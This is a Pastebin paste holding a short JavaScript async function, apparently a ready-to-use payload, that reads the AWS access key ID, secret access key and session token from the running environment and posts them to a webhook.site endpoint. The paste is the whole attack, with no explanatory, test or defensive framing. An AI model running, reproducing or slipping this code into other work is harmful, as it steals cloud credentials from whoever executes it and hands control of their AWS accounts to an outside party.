Advertisement
Cyber_specialist_one

Untitled

Jun 3rd, 2025
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. async axios => {
  2.   const webhook = 'https://webhook.site/c4aa137f-c41f-4dd0-9e14-3be34394f406'
  3.  
  4.   const res = await axios.post(webhook, {
  5.     accessKeyId: process.env.AWS_ACCESS_KEY_ID,
  6.     secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY,
  7.     sessionToken: process.env.AWS_SESSION_TOKEN
  8.   })
  9.  
  10.   return res.data
  11. }
  12.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement